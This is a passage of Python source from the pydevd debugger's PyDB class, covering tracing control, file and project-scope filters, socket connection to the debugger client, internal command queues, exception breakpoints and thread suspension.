val = sys.exc_info()[1]
finally:
if val is not None:
info.pydev_message = str(val)
def _internal_get_file_type(self, abs_real_path_and_basename):
basename = abs_real_path_and_basename[-1]
if (
basename.startswith(IGNORE_BASENAMES_STARTING_WITH) or
abs_real_path_and_basename[0].startswith(IGNORE_BASENAMES_STARTING_WITH)
):
# Note: these are the files that are completely ignored (they aren't shown to the user
# as user nor library code as it's usually just noise in the frame stack).
return self.PYDEV_FILE
file_type = self._dont_trace_get_file_type(basename)
if file_type is not None:
return file_type
if basename.startswith('__init__.py'):
# i.e.: ignore the __init__ files inside pydevd (the other
# files are ignored just by their name).
abs_path = abs_real_path_and_basename[0]
i = max(abs_path.rfind('/'), abs_path.rfind('\\'))
if i:
abs_path = abs_path[0:i]
i = max(abs_path.rfind('/'), abs_path.rfind('\\'))
if i:
dirname = abs_path[i + 1:]
# At this point, something as:
# "my_path\_pydev_runfiles\__init__.py"
# is now "_pydev_runfiles".
return self._dont_trace_dirs_get_file_type(dirname)
return None
def dont_trace_external_files(self, abs_path):
'''
:param abs_path:
The result from get_abs_path_real_path_and_base_from_file or
get_abs_path_real_path_and_base_from_frame.
:return
True :
If files should NOT be traced.
False:
If files should be traced.
'''
# By default all external files are traced. Note: this function is expected to
# be changed for another function in PyDevdAPI.set_dont_trace_start_end_patterns.
return False
def get_file_type(self, frame, abs_real_path_and_basename=None, _cache_file_type=_CACHE_FILE_TYPE):
'''
:param abs_real_path_and_basename:
The result from get_abs_path_real_path_and_base_from_file or
get_abs_path_real_path_and_base_from_frame.
:return
_pydevd_bundle.pydevd_dont_trace_files.PYDEV_FILE:
If it's a file internal to the debugger which shouldn't be
traced nor shown to the user.
_pydevd_bundle.pydevd_dont_trace_files.LIB_FILE:
If it's a file in a library which shouldn't be traced.
None:
If it's a regular user file which should be traced.
'''
if abs_real_path_and_basename is None:
try:
# Make fast path faster!
abs_real_path_and_basename = NORM_PATHS_AND_BASE_CONTAINER[frame.f_code.co_filename]
except:
abs_real_path_and_basename = get_abs_path_real_path_and_base_from_frame(frame)
# Note 1: we have to take into account that we may have files as '<string>', and that in
# this case the cache key can't rely only on the filename. With the current cache, there's
# still a potential miss if 2 functions which have exactly the same content are compiled
# with '<string>', but in practice as we only separate the one from python -c from the rest
# this shouldn't be a problem in practice.
# Note 2: firstlineno added to make misses faster in the first comparison.
# Note 3: this cache key is repeated in pydevd_frame_evaluator.pyx:get_func_code_info (for
# speedups).
cache_key = (frame.f_code.co_firstlineno, abs_real_path_and_basename[0], frame.f_code)
try:
return _cache_file_type[cache_key]
except:
if abs_real_path_and_basename[0] == '<string>':
# Consider it an untraceable file unless there's no back frame (ignoring
# internal files and runpy.py).
f = frame.f_back
while f is not None:
if (self.get_file_type(f) != self.PYDEV_FILE and
pydevd_file_utils.basename(f.f_code.co_filename) not in ('runpy.py', '<string>')):
# We found some back frame that's not internal, which means we must consider
# this a library file.
# This is done because we only want to trace files as <string> if they don't
# have any back frame (which is the case for python -c ...), for all other
# cases we don't want to trace them because we can't show the source to the
# user (at least for now...).
# Note that we return as a LIB_FILE and not PYDEV_FILE because we still want
# to show it in the stack.
_cache_file_type[cache_key] = LIB_FILE
return LIB_FILE
f = f.f_back
else:
# This is a top-level file (used in python -c), so, trace it as usual... we
# still won't be able to show the sources, but some tests require this to work.
_cache_file_type[cache_key] = None
return None
file_type = self._internal_get_file_type(abs_real_path_and_basename)
if file_type is None:
if self.dont_trace_external_files(abs_real_path_and_basename[0]):
file_type = PYDEV_FILE
_cache_file_type[cache_key] = file_type
return file_type
def is_cache_file_type_empty(self):
return not _CACHE_FILE_TYPE
def get_cache_file_type(self, _cache=_CACHE_FILE_TYPE): # i.e.: Make it local.
return _cache
def get_thread_local_trace_func(self):
try:
thread_trace_func = self._local_thread_trace_func.thread_trace_func
except AttributeError:
thread_trace_func = self.trace_dispatch
return thread_trace_func
def enable_tracing(self, thread_trace_func=None, apply_to_all_threads=False):
'''
Enables tracing.
If in regular mode (tracing), will set the tracing function to the tracing
function for this thread -- by default it's `PyDB.trace_dispatch`, but after
`PyDB.enable_tracing` is called with a `thread_trace_func`, the given function will
be the default for the given thread.
:param bool apply_to_all_threads:
If True we'll set the tracing function in all threads, not only in the current thread.
If False only the tracing for the current function should be changed.
In general apply_to_all_threads should only be true if this is the first time
this function is called on a multi-threaded program (either programmatically or attach
to pid).
'''
if self.frame_eval_func is not None:
self.frame_eval_func()
pydevd_tracing.SetTrace(self.dummy_trace_dispatch)
if IS_CPYTHON and apply_to_all_threads:
pydevd_tracing.set_trace_to_threads(self.dummy_trace_dispatch)
return
if apply_to_all_threads:
# If applying to all threads, don't use the local thread trace function.
assert thread_trace_func is not None
else:
if thread_trace_func is None:
thread_trace_func = self.get_thread_local_trace_func()
else:
self._local_thread_trace_func.thread_trace_func = thread_trace_func
pydevd_tracing.SetTrace(thread_trace_func)
if IS_CPYTHON and apply_to_all_threads:
pydevd_tracing.set_trace_to_threads(thread_trace_func)
def disable_tracing(self):
pydevd_tracing.SetTrace(None)
def on_breakpoints_changed(self, removed=False):
'''
When breakpoints change, we have to re-evaluate all the assumptions we've made so far.
'''
if not self.ready_to_run:
# No need to do anything if we're still not running.
return
self.mtime += 1
if not removed:
# When removing breakpoints we can leave tracing as was, but if a breakpoint was added
# we have to reset the tracing for the existing functions to be re-evaluated.
self.set_tracing_for_untraced_contexts()
def set_tracing_for_untraced_contexts(self):
# Enable the tracing for existing threads (because there may be frames being executed that
# are currently untraced).
if IS_CPYTHON:
# Note: use sys._current_frames instead of threading.enumerate() because this way
# we also see C/C++ threads, not only the ones visible to the threading module.
tid_to_frame = sys._current_frames()
ignore_thread_ids = set(
t.ident for t in threadingEnumerate()
if getattr(t, 'is_pydev_daemon_thread', False) or getattr(t, 'pydev_do_not_trace', False)
)
for thread_id, frame in tid_to_frame.items():
if thread_id not in ignore_thread_ids:
self.set_trace_for_frame_and_parents(frame)
else:
try:
threads = threadingEnumerate()
for t in threads:
if getattr(t, 'is_pydev_daemon_thread', False) or getattr(t, 'pydev_do_not_trace', False):
continue
additional_info = set_additional_thread_info(t)
frame = additional_info.get_topmost_frame(t)
try:
if frame is not None:
self.set_trace_for_frame_and_parents(frame)
finally:
frame = None
finally:
frame = None
t = None
threads = None
additional_info = None
@property
def multi_threads_single_notification(self):
return self._threads_suspended_single_notification.multi_threads_single_notification
@multi_threads_single_notification.setter
def multi_threads_single_notification(self, notify):
self._threads_suspended_single_notification.multi_threads_single_notification = notify
@property
def threads_suspended_single_notification(self):
return self._threads_suspended_single_notification
def get_plugin_lazy_init(self):
if self.plugin is None and SUPPORT_PLUGINS:
self.plugin = PluginManager(self)
return self.plugin
def in_project_scope(self, frame, absolute_filename=None):
'''
Note: in general this method should not be used (apply_files_filter should be used
in most cases as it also handles the project scope check).
:param frame:
The frame we want to check.
:param absolute_filename:
Must be the result from get_abs_path_real_path_and_base_from_frame(frame)[0] (can
be used to speed this function a bit if it's already available to the caller, but
in general it's not needed).
'''
try:
if absolute_filename is None:
try:
# Make fast path faster!
abs_real_path_and_basename = NORM_PATHS_AND_BASE_CONTAINER[frame.f_code.co_filename]
except:
abs_real_path_and_basename = get_abs_path_real_path_and_base_from_frame(frame)
absolute_filename = abs_real_path_and_basename[0]
cache_key = (frame.f_code.co_firstlineno, absolute_filename, frame.f_code)
return self._in_project_scope_cache[cache_key]
except KeyError:
cache = self._in_project_scope_cache
try:
abs_real_path_and_basename # If we've gotten it previously, use it again.
except NameError:
abs_real_path_and_basename = get_abs_path_real_path_and_base_from_frame(frame)
# pydevd files are never considered to be in the project scope.
file_type = self.get_file_type(frame, abs_real_path_and_basename)
if file_type == self.PYDEV_FILE:
cache[cache_key] = False
elif absolute_filename == '<string>':
# Special handling for '<string>'
if file_type == self.LIB_FILE:
cache[cache_key] = False
else:
cache[cache_key] = True
elif self.source_mapping.has_mapping_entry(absolute_filename):
cache[cache_key] = True
else:
cache[cache_key] = self._files_filtering.in_project_roots(absolute_filename)
return cache[cache_key]
def _clear_filters_caches(self):
self._in_project_scope_cache.clear()
self._exclude_by_filter_cache.clear()
self._apply_filter_cache.clear()
self._exclude_filters_enabled = self._files_filtering.use_exclude_filters()
self._is_libraries_filter_enabled = self._files_filtering.use_libraries_filter()
self.is_files_filter_enabled = self._exclude_filters_enabled or self._is_libraries_filter_enabled
def clear_dont_trace_start_end_patterns_caches(self):
# When start/end patterns are changed we must clear all caches which would be
# affected by a change in get_file_type() and reset the tracing function
# as places which were traced may no longer need to be traced and vice-versa.
self.on_breakpoints_changed()
_CACHE_FILE_TYPE.clear()
self._clear_filters_caches()
self._clear_skip_caches()
def _exclude_by_filter(self, frame, absolute_filename):
'''
:return: True if it should be excluded, False if it should be included and None
if no rule matched the given file.
:note: it'll be normalized as needed inside of this method.
'''
cache_key = (absolute_filename, frame.f_code.co_name, frame.f_code.co_firstlineno)
try:
return self._exclude_by_filter_cache[cache_key]
except KeyError:
cache = self._exclude_by_filter_cache
# pydevd files are always filtered out
if self.get_file_type(frame) == self.PYDEV_FILE:
cache[cache_key] = True
else:
module_name = None
if self._files_filtering.require_module:
module_name = frame.f_globals.get('__name__', '')
cache[cache_key] = self._files_filtering.exclude_by_filter(absolute_filename, module_name)
return cache[cache_key]
def apply_files_filter(self, frame, original_filename, force_check_project_scope):
'''
Should only be called if `self.is_files_filter_enabled == True` or `force_check_project_scope == True`.
Note that it covers both the filter by specific paths includes/excludes as well
as the check which filters out libraries if not in the project scope.
:param original_filename:
Note can either be the original filename or the absolute version of that filename.
:param force_check_project_scope:
Check that the file is in the project scope even if the global setting
is off.
:return bool:
True if it should be excluded when stepping and False if it should be
included.
'''
cache_key = (frame.f_code.co_firstlineno, original_filename, force_check_project_scope, frame.f_code)
try:
return self._apply_filter_cache[cache_key]
except KeyError:
if self.plugin is not None and (self.has_plugin_line_breaks or self.has_plugin_exception_breaks):
# If it's explicitly needed by some plugin, we can't skip it.
if not self.plugin.can_skip(self, frame):
pydev_log.debug_once('File traced (included by plugins): %s', original_filename)
self._apply_filter_cache[cache_key] = False
return False
if self._exclude_filters_enabled:
absolute_filename = pydevd_file_utils.absolute_path(original_filename)
exclude_by_filter = self._exclude_by_filter(frame, absolute_filename)
if exclude_by_filter is not None:
if exclude_by_filter:
# ignore files matching stepping filters
pydev_log.debug_once('File not traced (excluded by filters): %s', original_filename)
self._apply_filter_cache[cache_key] = True
return True
else:
pydev_log.debug_once('File traced (explicitly included by filters): %s', original_filename)
self._apply_filter_cache[cache_key] = False
return False
if (self._is_libraries_filter_enabled or force_check_project_scope) and not self.in_project_scope(frame):
# ignore library files while stepping
self._apply_filter_cache[cache_key] = True
if force_check_project_scope:
pydev_log.debug_once('File not traced (not in project): %s', original_filename)
else:
pydev_log.debug_once('File not traced (not in project - force_check_project_scope): %s', original_filename)
return True
if force_check_project_scope:
pydev_log.debug_once('File traced: %s (force_check_project_scope)', original_filename)
else:
pydev_log.debug_once('File traced: %s', original_filename)
self._apply_filter_cache[cache_key] = False
return False
def exclude_exception_by_filter(self, exception_breakpoint, trace):
if not exception_breakpoint.ignore_libraries and not self._exclude_filters_enabled:
return False
if trace is None:
return True
ignore_libraries = exception_breakpoint.ignore_libraries
exclude_filters_enabled = self._exclude_filters_enabled
if (ignore_libraries and not self.in_project_scope(trace.tb_frame)) \
or (exclude_filters_enabled and self._exclude_by_filter(
trace.tb_frame,
pydevd_file_utils.absolute_path(trace.tb_frame.f_code.co_filename))):
return True
return False
def set_project_roots(self, project_roots):
self._files_filtering.set_project_roots(project_roots)
self._clear_skip_caches()
self._clear_filters_caches()
def set_exclude_filters(self, exclude_filters):
self._files_filtering.set_exclude_filters(exclude_filters)
self._clear_skip_caches()
self._clear_filters_caches()
def set_use_libraries_filter(self, use_libraries_filter):
self._files_filtering.set_use_libraries_filter(use_libraries_filter)
self._clear_skip_caches()
self._clear_filters_caches()
def get_use_libraries_filter(self):
return self._files_filtering.use_libraries_filter()
def get_require_module_for_filters(self):
return self._files_filtering.require_module
def has_user_threads_alive(self):
for t in pydevd_utils.get_non_pydevd_threads():
if isinstance(t, PyDBDaemonThread):
pydev_log.error_once(
'Error in debugger: Found PyDBDaemonThread not marked with is_pydev_daemon_thread=True.\n')
if is_thread_alive(t):
if not t.isDaemon() or hasattr(t, "__pydevd_main_thread"):
return True
return False
def initialize_network(self, sock, terminate_on_socket_close=True):
assert sock is not None
try:
sock.settimeout(None) # infinite, no timeouts from now on - jython does not have it
except:
pass
curr_reader = getattr(self, 'reader', None)
curr_writer = getattr(self, 'writer', None)
if curr_reader:
curr_reader.do_kill_pydev_thread()
if curr_writer:
curr_writer.do_kill_pydev_thread()
self.writer = WriterThread(sock, self, terminate_on_socket_close=terminate_on_socket_close)
self.reader = ReaderThread(
sock,
self,
PyDevJsonCommandProcessor=PyDevJsonCommandProcessor,
process_net_command=process_net_command,
terminate_on_socket_close=terminate_on_socket_close
)
self.writer.start()
self.reader.start()
time.sleep(0.1) # give threads time to start
def connect(self, host, port):
if host:
s = start_client(host, port)
else:
s = start_server(port)
self.initialize_network(s)
def create_wait_for_connection_thread(self):
if self._waiting_for_connection_thread is not None:
raise AssertionError('There is already another thread waiting for a connection.')
self._server_socket_ready_event.clear()
self._waiting_for_connection_thread = self._WaitForConnectionThread(self)
self._waiting_for_connection_thread.start()
def set_server_socket_ready(self):
self._server_socket_ready_event.set()
def wait_for_server_socket_ready(self):
self._server_socket_ready_event.wait()
@property
def dap_messages_listeners(self):
return self._dap_messages_listeners
def add_dap_messages_listener(self, listener):
self._dap_messages_listeners.append(listener)
class _WaitForConnectionThread(PyDBDaemonThread):
def __init__(self, py_db):
PyDBDaemonThread.__init__(self, py_db)
self._server_socket = None
def run(self):
host = SetupHolder.setup['client']
port = SetupHolder.setup['port']
self._server_socket = create_server_socket(host=host, port=port)
self.py_db._server_socket_name = self._server_socket.getsockname()
self.py_db.set_server_socket_ready()
while not self._kill_received:
try:
s = self._server_socket
if s is None:
return
s.listen(1)
new_socket, _addr = s.accept()
if self._kill_received:
pydev_log.info("Connection (from wait_for_attach) accepted but ignored as kill was already received.")
return
pydev_log.info("Connection (from wait_for_attach) accepted.")
reader = getattr(self.py_db, 'reader', None)
if reader is not None:
# This is needed if a new connection is done without the client properly
# sending a disconnect for the previous connection.
api = PyDevdAPI()
api.request_disconnect(self.py_db, resume_threads=False)
self.py_db.initialize_network(new_socket, terminate_on_socket_close=False)
except:
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 0:
pydev_log.exception()
pydev_log.debug("Exiting _WaitForConnectionThread: %s\n", port)
def do_kill_pydev_thread(self):
PyDBDaemonThread.do_kill_pydev_thread(self)
s = self._server_socket
if s is not None:
try:
s.close()
except:
pass
self._server_socket = None
def get_internal_queue(self, thread_id):
""" returns internal command queue for a given thread.
if new queue is created, notify the RDB about it """
if thread_id.startswith('__frame__'):
thread_id = thread_id[thread_id.rfind('|') + 1:]
return self._cmd_queue[thread_id]
def post_method_as_internal_command(self, thread_id, method, *args, **kwargs):
if thread_id == '*':
internal_cmd = InternalThreadCommandForAnyThread(thread_id, method, *args, **kwargs)
else:
internal_cmd = InternalThreadCommand(thread_id, method, *args, **kwargs)
self.post_internal_command(internal_cmd, thread_id)
if thread_id == '*':
# Notify so that the command is handled as soon as possible.
self._py_db_command_thread_event.set()
def post_internal_command(self, int_cmd, thread_id):
""" if thread_id is *, post to the '*' queue"""
queue = self.get_internal_queue(thread_id)
queue.put(int_cmd)
def enable_output_redirection(self, redirect_stdout, redirect_stderr):
global _global_redirect_stdout_to_server
global _global_redirect_stderr_to_server
_global_redirect_stdout_to_server = redirect_stdout
_global_redirect_stderr_to_server = redirect_stderr
self.redirect_output = redirect_stdout or redirect_stderr
if _global_redirect_stdout_to_server:
_init_stdout_redirect()
if _global_redirect_stderr_to_server:
_init_stderr_redirect()
def check_output_redirect(self):
global _global_redirect_stdout_to_server
global _global_redirect_stderr_to_server
if _global_redirect_stdout_to_server:
_init_stdout_redirect()
if _global_redirect_stderr_to_server:
_init_stderr_redirect()
def init_matplotlib_in_debug_console(self):
# import hook and patches for matplotlib support in debug console
from _pydev_bundle.pydev_import_hook import import_hook_manager
if is_current_thread_main_thread():
for module in dict_keys(self.mpl_modules_for_patching):
import_hook_manager.add_module_name(module, self.mpl_modules_for_patching.pop(module))
def init_matplotlib_support(self):
# prepare debugger for integration with matplotlib GUI event loop
from pydev_ipython.matplotlibtools import activate_matplotlib, activate_pylab, activate_pyplot, do_enable_gui
# enable_gui_function in activate_matplotlib should be called in main thread. Unlike integrated console,
# in the debug console we have no interpreter instance with exec_queue, but we run this code in the main
# thread and can call it directly.
class _MatplotlibHelper:
_return_control_osc = False
def return_control():
# Some of the input hooks (e.g. Qt4Agg) check return control without doing
# a single operation, so we don't return True on every
# call when the debug hook is in place to allow the GUI to run
_MatplotlibHelper._return_control_osc = not _MatplotlibHelper._return_control_osc
return _MatplotlibHelper._return_control_osc
from pydev_ipython.inputhook import set_return_control_callback
set_return_control_callback(return_control)
self.mpl_modules_for_patching = {"matplotlib": lambda: activate_matplotlib(do_enable_gui),
"matplotlib.pyplot": activate_pyplot,
"pylab": activate_pylab }
def _activate_mpl_if_needed(self):
if len(self.mpl_modules_for_patching) > 0:
if is_current_thread_main_thread(): # Note that we call only in the main thread.
for module in dict_keys(self.mpl_modules_for_patching):
if module in sys.modules:
activate_function = self.mpl_modules_for_patching.pop(module, None)
if activate_function is not None:
activate_function()
self.mpl_in_use = True
def _call_mpl_hook(self):
try:
from pydev_ipython.inputhook import get_inputhook
inputhook = get_inputhook()
if inputhook:
inputhook()
except:
pass
def notify_skipped_step_in_because_of_filters(self, frame):
self.writer.add_command(self.cmd_factory.make_skipped_step_in_because_of_filters(self, frame))
def notify_thread_created(self, thread_id, thread, use_lock=True):
if self.writer is None:
# Protect about threads being created before the communication structure is in place
# (note that they will appear later on anyways as pydevd does reconcile live/dead threads
# when processing internal commands, albeit it may take longer and in general this should
# not be usual as it's expected that the debugger is live before other threads are created).
return
with self._lock_running_thread_ids if use_lock else NULL:
if not self._enable_thread_notifications:
return
if thread_id in self._running_thread_ids:
return
additional_info = set_additional_thread_info(thread)
if additional_info.pydev_notify_kill:
# After we notify it should be killed, make sure we don't notify it's alive (on a racing condition
# this could happen as we may notify before the thread is stopped internally).
return
self._running_thread_ids[thread_id] = thread
self.writer.add_command(self.cmd_factory.make_thread_created_message(thread))
def notify_thread_not_alive(self, thread_id, use_lock=True):
""" if thread is not alive, cancel trace_dispatch processing """
if self.writer is None:
return
with self._lock_running_thread_ids if use_lock else NULL:
if not self._enable_thread_notifications:
return
thread = self._running_thread_ids.pop(thread_id, None)
if thread is None:
return
additional_info = set_additional_thread_info(thread)
was_notified = additional_info.pydev_notify_kill
if not was_notified:
additional_info.pydev_notify_kill = True
self.writer.add_command(self.cmd_factory.make_thread_killed_message(thread_id))
def set_enable_thread_notifications(self, enable):
with self._lock_running_thread_ids:
if self._enable_thread_notifications != enable:
self._enable_thread_notifications = enable
if enable:
# As it was previously disabled, we have to notify about existing threads again
# (so, clear the cache related to that).
self._running_thread_ids = {}
def process_internal_commands(self):
'''
This function processes internal commands.
'''
# If this method is being called before the debugger is ready to run we should not notify
# about threads and should only process commands sent to all threads.
ready_to_run = self.ready_to_run
dispose = False
with self._main_lock:
program_threads_alive = {}
if ready_to_run:
self.check_output_redirect()
all_threads = threadingEnumerate()
program_threads_dead = []
with self._lock_running_thread_ids:
reset_cache = not self._running_thread_ids
for t in all_threads:
if getattr(t, 'is_pydev_daemon_thread', False):
pass # I.e.: skip the DummyThreads created from pydev daemon threads
elif isinstance(t, PyDBDaemonThread):
pydev_log.error_once('Error in debugger: Found PyDBDaemonThread not marked with is_pydev_daemon_thread=True.')
elif is_thread_alive(t):
if reset_cache:
# Fix multiprocessing debug with breakpoints in both main and child processes
# (https://youtrack.jetbrains.com/issue/PY-17092) When the new process is created, the main
# thread in the new process already has the attribute 'pydevd_id', so the new thread doesn't
# get new id with its process number and the debugger loses access to both threads.
# Therefore we should update thread_id for every main thread in the new process.
clear_cached_thread_id(t)
thread_id = get_thread_id(t)
program_threads_alive[thread_id] = t
self.notify_thread_created(thread_id, t, use_lock=False)
# Compute and notify about threads which are no longer alive.
thread_ids = list(self._running_thread_ids.keys())
for thread_id in thread_ids:
if thread_id not in program_threads_alive:
program_threads_dead.append(thread_id)
for thread_id in program_threads_dead:
self.notify_thread_not_alive(thread_id, use_lock=False)
cmds_to_execute = []
# Without self._lock_running_thread_ids
if len(program_threads_alive) == 0 and ready_to_run:
dispose = True
else:
# Actually process the commands now (make sure we don't have a lock for _lock_running_thread_ids
# acquired at this point as it could lead to a deadlock if some command evaluated tried to
# create a thread and wait for it -- which would try to notify about it getting that lock).
curr_thread_id = get_current_thread_id(threadingCurrentThread())
if ready_to_run:
process_thread_ids = (curr_thread_id, '*')
else:
process_thread_ids = ('*',)
for thread_id in process_thread_ids:
queue = self.get_internal_queue(thread_id)
# some commands must be processed by the thread itself... if that's the case,
# we will re-add the commands to the queue after executing.
cmds_to_add_back = []
try:
while True:
int_cmd = queue.get(False)
if not self.mpl_hooks_in_debug_console and isinstance(int_cmd, InternalConsoleExec):
# add import hooks for matplotlib patches if only debug console was started
try:
self.init_matplotlib_in_debug_console()
self.mpl_in_use = True
except:
pydev_log.debug("Matplotlib support in debug console failed", traceback.format_exc())
self.mpl_hooks_in_debug_console = True
if int_cmd.can_be_executed_by(curr_thread_id):
cmds_to_execute.append(int_cmd)
else:
pydev_log.verbose("NOT processing internal command: %s ", int_cmd)
cmds_to_add_back.append(int_cmd)
except _queue.Empty: # @UndefinedVariable
# this is how we exit
for int_cmd in cmds_to_add_back:
queue.put(int_cmd)
if dispose:
# Note: must be called without the main lock to avoid deadlocks.
self.dispose_and_kill_all_pydevd_threads()
else:
# Actually execute the commands without the main lock!
for int_cmd in cmds_to_execute:
pydev_log.verbose("processing internal command: %s", int_cmd)
try:
int_cmd.do_it(self)
except:
pydev_log.exception('Error processing internal command.')
def consolidate_breakpoints(self, canonical_normalized_filename, id_to_breakpoint, breakpoints):
break_dict = {}
for _breakpoint_id, pybreakpoint in dict_iter_items(id_to_breakpoint):
break_dict[pybreakpoint.line] = pybreakpoint
breakpoints[canonical_normalized_filename] = break_dict
self._clear_skip_caches()
def _clear_skip_caches(self):
global_cache_skips.clear()
global_cache_frame_skips.clear()
def add_break_on_exception(
self,
exception,
condition,
expression,
notify_on_handled_exceptions,
notify_on_unhandled_exceptions,
notify_on_user_unhandled_exceptions,
notify_on_first_raise_only,
ignore_libraries=False
):
try:
eb = ExceptionBreakpoint(
exception,
condition,
expression,
notify_on_handled_exceptions,
notify_on_unhandled_exceptions,
notify_on_user_unhandled_exceptions,
notify_on_first_raise_only,
ignore_libraries
)
except ImportError:
pydev_log.critical("Error unable to add break on exception for: %s (exception could not be imported).", exception)
return None
if eb.notify_on_unhandled_exceptions:
cp = self.break_on_uncaught_exceptions.copy()
cp[exception] = eb
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.critical("Exceptions to hook on terminate: %s.", cp)
self.break_on_uncaught_exceptions = cp
if eb.notify_on_handled_exceptions:
cp = self.break_on_caught_exceptions.copy()
cp[exception] = eb
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.critical("Exceptions to hook always: %s.", cp)
self.break_on_caught_exceptions = cp
if eb.notify_on_user_unhandled_exceptions:
cp = self.break_on_user_uncaught_exceptions.copy()
cp[exception] = eb
if DebugInfoHolder.DEBUG_TRACE_BREAKPOINTS > 0:
pydev_log.critical("Exceptions to hook on user uncaught code: %s.", cp)
self.break_on_user_uncaught_exceptions = cp
return eb
def set_suspend(self, thread, stop_reason, suspend_other_threads=False, is_pause=False, original_step_cmd=-1):
'''
:param thread:
The thread which should be suspended.
:param stop_reason:
Reason why the thread was suspended.
:param suspend_other_threads:
Whether to force other threads to be suspended (i.e.: when hitting a breakpoint
with a suspend all threads policy).
:param is_pause:
If this is a pause to suspend all threads, any thread can be considered as the 'main'
thread paused.
:param original_step_cmd:
If given we may change the stop reason to this.
'''
self._threads_suspended_single_notification.increment_suspend_time()
if is_pause:
self._threads_suspended_single_notification.on_pause()
info = mark_thread_suspended(thread, stop_reason, original_step_cmd=original_step_cmd)
if is_pause:
# Must set tracing after setting the state to suspend.
frame = info.get_topmost_frame(thread)
if frame is not None:
try:
self.set_trace_for_frame_and_parents(frame)
finally:
frame = None
# If conditional breakpoint raises any exception during evaluation send the details to the client.
if stop_reason == CMD_SET_BREAK and info.conditional_breakpoint_exception is not None:
conditional_breakpoint_exception_tuple = info.conditional_breakpoint_exception
info.conditional_breakpoint_exception = None
self._send_breakpoint_condition_exception(thread, conditional_breakpoint_exception_tuple)
if not suspend_other_threads and self.multi_threads_single_notification:
# In the mode which gives a single notification when all threads are
# stopped, stop all threads whenever a set_suspend is issued.
suspend_other_threads = True
if suspend_other_threads:
# Suspend all except the current one (which we're currently suspending already).
suspend_all_threads(self, except_thread=thread)
def _send_breakpoint_condition_exception(self, thread, conditional_breakpoint_exception_tuple):
"""If conditional breakpoint raises an exception during evaluation
send exception details to java
"""
thread_id = get_thread_id(thread)
# conditional_breakpoint_exception_tuple - should contain 2 values (exception_type, stacktrace)
if conditional_breakpoint_exception_tuple and len(conditional_breakpoint_exception_tuple) == 2:
exc_type, stacktrace = conditional_breakpoint_exception_tuple
int_cmd = InternalGetBreakpointException(thread_id, exc_type, stacktrace)
self.post_internal_command(int_cmd, thread_id)
def send_caught_exception_stack(self, thread, arg, curr_frame_id):
"""Sends details on the exception which was caught (and where we stopped) to the java side.
arg is: exception type, description, traceback object
"""
thread_id = get_thread_id(thread)
int_cmd = InternalSendCurrExceptionTrace(thread_id, arg, curr_frame_id)
self.post_internal_command(int_cmd, thread_id)
def send_caught_exception_stack_proceeded(self, thread):
"""Sends that some thread was resumed and is no longer showing an exception trace.
"""
thread_id = get_thread_id(thread)
int_cmd = InternalSendCurrExceptionTraceProceeded(thread_id)
self.post_internal_command(int_cmd, thread_id)
self.process_internal_commands()
def send_process_created_message(self):
"""Sends a message that a new process has been created.
"""
if self.writer is None or self.cmd_factory is None:
return
cmd = self.cmd_factory.make_process_created_message()
self.writer.add_command(cmd)
def set_next_statement(self, frame, event, func_name, next_line):
stop = False
response_msg = ""
old_line = frame.f_lineno
if event == 'line' or event == 'exception':
# If we're already in the correct context, we have to stop it now, because we can act only on
# line events -- if a return was the next statement it wouldn't work (so, we have this code
# repeated at pydevd_frame).
curr_func_name = frame.f_code.co_name
# global context is set with an empty name
if curr_func_name in ('?', '<module>'):
curr_func_name = ''
if func_name == '*' or curr_func_name == func_name:
line = next_line
frame.f_trace = self.trace_dispatch
frame.f_lineno = line
stop = True
else:
response_msg = "jump is available only within the bottom frame"
return stop, old_line, response_msg
def cancel_async_evaluation(self, thread_id, frame_id):
with self._main_lock:
try:
all_threads = threadingEnumerate()
for t in all_threads:
if getattr(t, 'is_pydev_daemon_thread', False) and hasattr(t, 'cancel_event') and t.thread_id == thread_id and \
t.frame_id == frame_id:
t.cancel_event.set()
except:
pydev_log.exception()
def find_frame(self, thread_id, frame_id):
""" returns a frame on the thread that has a given frame_id """
return self.suspended_frames_manager.find_frame(thread_id, frame_id)
def do_wait_suspend(self, thread, frame, event, arg, exception_type=None): # @UnusedVariable
""" busy waits until the thread state changes to RUN
it expects thread's state as attributes of the thread.
Upon running, processes any outstanding Stepping commands.
:param exception_type:
If pausing due to an exception, its type.
"""
if USE_CUSTOM_SYS_CURRENT_FRAMES_MAP:
constructed_tid_to_last_frame[thread.ident] = sys._getframe()
self.process_internal_commands()
thread_id = get_current_thread_id(thread)
# print('do_wait_suspend %s %s %s %s %s %s (%s)' % (frame.f_lineno, frame.f_code.co_name, frame.f_code.co_filename, event, arg, constant_to_str(thread.additional_info.pydev_step_cmd), constant_to_str(thread.additional_info.pydev_original_step_cmd)))
# Send the suspend message
message = thread.additional_info.pydev_message
suspend_type = thread.additional_info.trace_suspend_type
thread.additional_info.trace_suspend_type = 'trace' # Reset to trace mode for next call.
stop_reason = thread.stop_reason
frames_list = None
if arg is not None and event == 'exception':
# arg must be the exception info (tuple(exc_type, exc, traceback))
exc_type, exc_desc, trace_obj = arg
if trace_obj is not None:
frames_list = pydevd_frame_utils.create_frames_list_from_traceback(trace_obj, frame, exc_type, exc_desc, exception_type=exception_type)
if frames_list is None:
frames_list = pydevd_frame_utils.create_frames_list_from_frame(frame)
if DebugInfoHolder.DEBUG_TRACE_LEVEL > 2:
pydev_log.debug(
'PyDB.do_wait_suspend\nname: %s (line: %s)\n file: %s\n event: %s\n arg: %s\n step: %s (original step: %s)\n thread: %s, thread id: %s, id(thread): %s',
frame.f_code.co_name,
frame.f_lineno,
frame.f_code.co_filename,
event,
arg,
constant_to_str(thread.additional_info.pydev_step_cmd),
constant_to_str(thread.additional_info.pydev_original_step_cmd),
thread,
thread_id,
id(thread),
)
for f in frames_list:
pydev_log.debug(' Stack: %s, %s, %s', f.f_code.co_filename, f.f_code.co_name, f.f_lineno)
with self.suspended_frames_manager.track_frames(self) as frames_tracker:
frames_tracker.track(thread_id, frames_list)
cmd = frames_tracker.create_thread_suspend_command(thread_id, stop_reason, message, suspend_type)
self.writer.add_command(cmd)
with CustomFramesContainer.custom_frames_lock: # @UndefinedVariable
from_this_thread = []
for frame_custom_thread_id, custom_frame in dict_iter_items(CustomFramesContainer.custom_frames):
if custom_frame.thread_id == thread.ident:
frames_tracker.track(thread_id, pydevd_frame_utils.create_frames_list_from_frame(custom_frame.frame), frame_custom_thread_id=frame_custom_thread_id)
# print('Frame created as thread: %s' % (frame_custom_thread_id,))
